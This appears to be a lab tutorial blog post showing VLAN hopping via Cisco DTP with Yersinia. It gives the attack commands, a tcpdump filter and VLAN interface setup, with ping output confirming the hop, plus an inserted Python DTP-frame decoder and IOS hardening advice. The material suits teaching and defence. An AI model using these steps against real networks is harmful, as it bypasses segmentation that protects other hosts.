VLAN hopping via DTP (Dynamic Trunking Protocol) using Yersinia

Ismael Rodríguez
Feb 17, 2021 · 4 min read

Hi. In this article I’m going to explain, in a very summarized way, how we can hop VLANs via Dynamic Trunking Protocol (DTP) using a tool called Yersinia. Please note that DTP is a Cisco proprietary protocol, so we’ll need a Cisco switch in our environment to perform this kind of attack.

In order for the attack to succeed, the switch port mode has to be set to dynamic desirable, dynamic auto or trunk, so that the switch negotiates and sends DTP packets. By default, Cisco switches are set to dynamic desirable.

This is the topology for our test lab:

The attack step-by-step

First of all, we verify that hosts on VLAN10 can ping each other.

Ping from Attacker to Host B:

┌──(kali㉿kali)-[~]
└─$ ping 192.168.10.3
PING 192.168.10.3 (192.168.10.3) 56(84) bytes of data.
64 bytes from 192.168.10.3: icmp_seq=1 ttl=64 time=0.431 ms
64 bytes from 192.168.10.3: icmp_seq=2 ttl=64 time=0.590 ms
64 bytes from 192.168.10.3: icmp_seq=3 ttl=64 time=0.477 ms
64 bytes from 192.168.10.3: icmp_seq=4 ttl=64 time=0.261 ms
^C
--- 192.168.10.3 ping statistics ---
4 packets transmitted, 4 received, 0% packet loss, time 3072ms
rtt min/avg/max/mdev = 0.261/0.439/0.590/0.118 ms

From Host B to Attacker:

HostB~» ping 192.168.10.2
PING 192.168.10.2 (192.168.10.2) 56(84) bytes of data.
64 bytes from 192.168.10.2: icmp_seq=1 ttl=64 time=0.242 ms
64 bytes from 192.168.10.2: icmp_seq=2 ttl=64 time=0.441 ms
64 bytes from 192.168.10.2: icmp_seq=3 ttl=64 time=0.432 ms
64 bytes from 192.168.10.2: icmp_seq=4 ttl=64 time=0.425 ms
^C
--- 192.168.10.2 ping statistics ---
4 packets transmitted, 4 received, 0% packet loss, time 70ms
rtt min/avg/max/mdev = 0.242/0.385/0.441/0.082 ms

Let’s check that we can’t reach the victim host from our attacker machine with a ping:

┌──(kali㉿kali)-[~]
└─$ ping 192.168.20.2
PING 192.168.20.2 (192.168.20.2) 56(84) bytes of data.
From 192.168.10.1 icmp_seq=1 Destination Host Unreachable
From 192.168.10.1 icmp_seq=2 Destination Host Unreachable
From 192.168.10.1 icmp_seq=3 Destination Host Unreachable
^C
--- 192.168.20.2 ping statistics ---
7 packets transmitted, 0 received, +6 errors, 100% packet loss, time 6067ms

(The origin sender is 192.168.10.1 because I am using this host as the gateway in our VLAN.)

Now we want the victim host to be reachable from our host. We are going to use a tool called Yersinia, a very powerful tool for performing layer 2 attacks. It comes preinstalled in Kali.

We open Yersinia in graphical mode by running this command:

sudo yersinia -G

Then we click “Launch attack” and go to the DTP tab, where we select the “enabling trunking” radio button:

Before clicking “OK” we can start a listener for DTP packets to confirm that our DTP attack is actually sending them. We can set up this listener with tcpdump, executed as follows:

sudo tcpdump -n -v -i eth0 -s 0 'ether[20:2] == 0x2004'

Please note that my network interface is identified as eth0, but yours may differ.

Then we click OK in the attack window in yersinia and we’ll see the packets being sent in our tcpdump listener:
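As an added example (not part of the original post), here is a small Python decoder for the frames that tcpdump filter matches: the filter tests the SNAP protocol id at byte offset 20, which is 0x2004 for DTP, and the decoder pulls out the domain, trunk status and neighbor fields so that a capture from a host-facing port shows whether that port is still negotiating trunks. The sample frame bytes and the MAC address in them are constructed for this example.

```python
from dataclasses import dataclass

DTP_DST_MAC = bytes.fromhex("01000ccccccc")            # Cisco multicast used by DTP
SNAP_DTP = bytes.fromhex("aaaa03" "00000c" "2004")     # LLC SNAP + Cisco OUI + PID 0x2004
TOS = {0x00: "access", 0x80: "trunk"}                  # trunk operating status (bit 7)
TAS = {1: "on", 2: "off", 3: "desirable", 4: "auto"}   # trunk administrative status (low bits)

@dataclass
class DtpFrame:
    src_mac: str
    version: int
    domain: str = ""
    status: str = ""
    neighbor: str = ""

def parse_dtp(frame: bytes):
    """Return a DtpFrame if `frame` is a DTP announcement, otherwise None."""
    # Same test as 'ether[20:2] == 0x2004': 14-byte 802.3 header, 3-byte LLC,
    # 3-byte OUI, then the 2-byte SNAP protocol id lands at offset 20.
    if len(frame) < 23 or frame[:6] != DTP_DST_MAC or frame[14:22] != SNAP_DTP:
        return None
    body = frame[22:]
    out = DtpFrame(src_mac=frame[6:12].hex(":"), version=body[0])
    pos = 1
    while pos + 4 <= len(body):
        ttype = int.from_bytes(body[pos:pos + 2], "big")
        tlen = int.from_bytes(body[pos + 2:pos + 4], "big")  # includes the 4-byte TLV header
        if tlen < 4 or pos + tlen > len(body):
            break  # malformed or truncated TLV: stop rather than read past the frame
        value = body[pos + 4:pos + tlen]
        if ttype == 1:
            out.domain = value.rstrip(b"\x00").decode("ascii", "replace")
        elif ttype == 2 and value:
            out.status = f"{TOS.get(value[0] & 0x80, '?')}/{TAS.get(value[0] & 0x07, '?')}"
        elif ttype == 4 and len(value) == 6:
            out.neighbor = value.hex(":")
        pos += tlen
    return out

def dtp_report(frames):
    """One line per DTP frame seen; any line at all means the link negotiates trunks."""
    return [f"DTP from {d.src_mac} domain={d.domain!r} status={d.status}"
            for d in map(parse_dtp, frames) if d is not None]

# Constructed sample frame: a desirable-mode announcement from the hypothetical 00:0c:29:aa:bb:cc.
_payload = (SNAP_DTP + bytes.fromhex("01")
            + bytes.fromhex("0001 0007") + b"lab"          # domain TLV
            + bytes.fromhex("0002 0005 03")                 # status TLV: access/desirable
            + bytes.fromhex("0004 000a 000c29aabbcc"))      # neighbor MAC TLV
SAMPLE_FRAME = DTP_DST_MAC + bytes.fromhex("000c29aabbcc") + len(_payload).to_bytes(2, "big") + _payload
```

Seeing any DTP frame at all on a host-facing port means that port still negotiates trunks; on Cisco IOS the fix is `switchport mode access` together with `switchport nonegotiate`.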

Now we only have to create a new VLAN interface with ID 20 and an unused IP address. Make sure to pick an IP that is not in use in the victim VLAN; we’ll use a high address (192.168.20.80) in this case. To achieve this we execute these commands on our Kali (attacker) machine:

~$ modprobe 8021q
~$ vconfig add eth0 20
~$ ifconfig eth0.20 up
~$ ifconfig eth0.20 192.168.20.80 up

Then we restart our network adapter and ping the victim host. We should reach it now and receive a response!

┌──(kali㉿kali)-[~]
└─$ ping 192.168.20.2
PING 192.168.20.2 (192.168.20.2) 56(84) bytes of data.
64 bytes from 192.168.20.2: icmp_seq=1 ttl=64 time=0.502 ms
64 bytes from 192.168.20.2: icmp_seq=2 ttl=64 time=0.483 ms
64 bytes from 192.168.20.2: icmp_seq=3 ttl=64 time=0.371 ms
64 bytes from 192.168.20.2: icmp_seq=4 ttl=64 time=0.355 ms
^C
--- 192.168.20.2 ping statistics ---
4 packets transmitted, 4 received, 0% packet loss, time 2834ms
rtt min/avg/max/mdev = 0.355/0.427/0.502/0.105 ms

Thanks for reading, I hope it may be helpful at some point in your cybersecurity career ;)


Ismael Rodríguez

Cyber Security Engineer | CySA+, OSCP, Security+, ISO 27001 LA, AWS Architect